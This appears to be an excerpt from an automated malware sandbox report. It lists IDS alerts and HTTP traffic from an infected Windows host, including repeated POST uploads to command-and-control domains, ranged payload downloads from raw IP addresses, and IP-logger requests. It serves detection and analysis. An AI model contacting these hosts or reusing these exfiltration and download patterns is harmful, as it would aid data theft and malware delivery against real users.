                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61737 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61738 -> 176.113.115.7:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61740 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61742 -> 188.114.96.3:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:61743 -> 104.21.48.1:443
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:61748 -> 176.113.115.7:80
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=dXim718NJuT6SMnUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14902Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4Ruvv4UdbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15053Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ngKn1v0V1WN04NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14909Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5nIDtjx9SaOt2Y9ERUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19950Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=oubL357TogCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15075Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: jowinjoinery.icu
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=78D02Ob5Jen9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2283Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=wsHOjQ1NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19917Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VvU9RMbDhVby2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14894Host: jowinjoinery.icu
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N3HJ92r8FN27zHgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550817Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=hKI7L75vVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2272Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2lpsvTz6516BbUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15075Host: jowinjoinery.icu
                          Source: global trafficHTTP traffic detected: GET /ZATFQO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.link
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=kzepD8AlkivMx7rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550920Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /dAnjhw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: crosshairc.life
                          Source: global trafficHTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3iMRAMVd55NTPZ1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19942Host: jowinjoinery.icu
                          Source: global trafficHTTP traffic detected: GET /images/pixel.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.linkCookie: g_session=eyJpdiI6Imd4RnNzQlgxRStCUnVoUjI0YS9saGc9PSIsInZhbHVlIjoiMGUzUDRpc091V2EyV2luaG5EZ0JwQVNTV0g2c2lMV1EweG5meUlaMGRuNkIyVE5QNkZ1czBWZEI1TXpwelVlSVE0OVY1VnJvOFR4bitLUVlycjNHdUF0NStHdkVKM0l1UVBreFo1b0FpMFFCc3FsV0FkdGpmendCem50dzRFUm0iLCJtYWMiOiJjOTBhZDc1YmVhOWQwYTU0MjFiZjMwMjAxZTA1N2NhZmRkOTQxZGYxYmEyZjBmNTg3NzQyYjUyZWE0NWE2M2MyIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IjcvTzJKUC80dHFPOHJwMlJFb2x4cmc9PSIsInZhbHVlIjoibXNWdWxGWFpaellSd3V6VnRqNTF5bnEzSVJBMDg2MFZQZ3FYNWc0ZkJCTTQ3dXZoTW9kNGcvK2ZtOEpKSDBvNmVoejZscHJtS1F6Njgza092RVR1aDgxZEhlN1lEZzkvYmNiTktYZytOWXh6RTlKU3MxbzM5UXU4MHVpSXRvLzkiLCJtYWMiOiI4NWM4MDQ5ZDNkMDlmMWQyMDAxMzFkYzNmMjY4ODNmOGRhYmY0MDIwZWM3MWVhNDE3ODVmZTg4YTUyYzc5ZDkxIiwidGFnIjoiIn0%3D
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 99Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 59Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8HgZFfDr7e7bswa4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2299Host: jowinjoinery.icu
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6AF9Qc4c82d1bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14902Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7Ly8iXL11058p8R1SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552257Host: jowinjoinery.icu
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=cFIIcTOTKWPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15073Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /bdWUa HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: jowinjoinery.icu
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=hrixXx0NVpBAw9pPFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19960Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=y4g0s8MnmC0Bdj8HKMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2339Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=07dRRHjr88Ea4NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551707Host: citydisco.bet
                          Source: global trafficHTTP traffic detected: GET /data/003 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                          Source: global trafficHTTP traffic detected: GET /clean HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: 107.174.192.179
                          Source: global trafficHTTP traffic detected: HEAD /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-163839User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=163840-196607User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=196608-229375User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=229376-262143User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=262144-294911User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=294912-327679User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=327680-360447User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=360448-393215User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=393216-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-589823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=589824-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-851967User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=851968-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1179647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1179648-1310719User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1310720-1441791User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1441792-1572863User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1572864-1703935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1703936-1835007User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1835008-1966079User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1966080-2228223User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2228224-2490367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2490368-2752511User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2752512-3014655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3014656-3276799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3276800-3538943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3538944-3801087User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=3801088-4063231User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4063232-4587519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=4587520-5111807User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: global trafficHTTP traffic detected: GET /003/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=5111808-5606383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.6
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.7
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_002305B0 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,11_2_002305B0
                          Source: global trafficHTTP traffic detected: GET /ZATFQO HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.link
                          Source: global trafficHTTP traffic detected: GET /images/pixel.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: grabify.linkCookie: g_session=eyJpdiI6Imd4RnNzQlgxRStCUnVoUjI0YS9saGc9PSIsInZhbHVlIjoiMGUzUDRpc091V2EyV2luaG5EZ0JwQVNTV0g2c2lMV1EweG5meUlaMGRuNkIyVE5QNkZ1czBWZEI1TXpwelVlSVE0OVY1VnJvOFR4bitLUVlycjNHdUF0NStHdkVKM0l1UVBreFo1b0FpMFFCc3FsV0FkdGpmendCem50dzRFUm0iLCJtYWMiOiJjOTBhZDc1YmVhOWQwYTU0MjFiZjMwMjAxZTA1N2NhZmRkOTQxZGYxYmEyZjBmNTg3NzQyYjUyZWE0NWE2M2MyIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IjcvTzJKUC80dHFPOHJwMlJFb2x4cmc9PSIsInZhbHVlIjoibXNWdWxGWFpaellSd3V6VnRqNTF5bnEzSVJBMDg2MFZQZ3FYNWc0ZkJCTTQ3dXZoTW9kNGcvK2ZtOEpKSDBvNmVoejZscHJtS1F6Njgza092RVR1aDgxZEhlN1lEZzkvYmNiTktYZytOWXh6RTlKU3MxbzM5UXU4MHVpSXRvLzkiLCJtYWMiOiI4NWM4MDQ5ZDNkMDlmMWQyMDAxMzFkYzNmMjY4ODNmOGRhYmY0MDIwZWM3MWVhNDE3ODVmZTg4YTUyYzc5ZDkxIiwidGFnIjoiIn0%3D
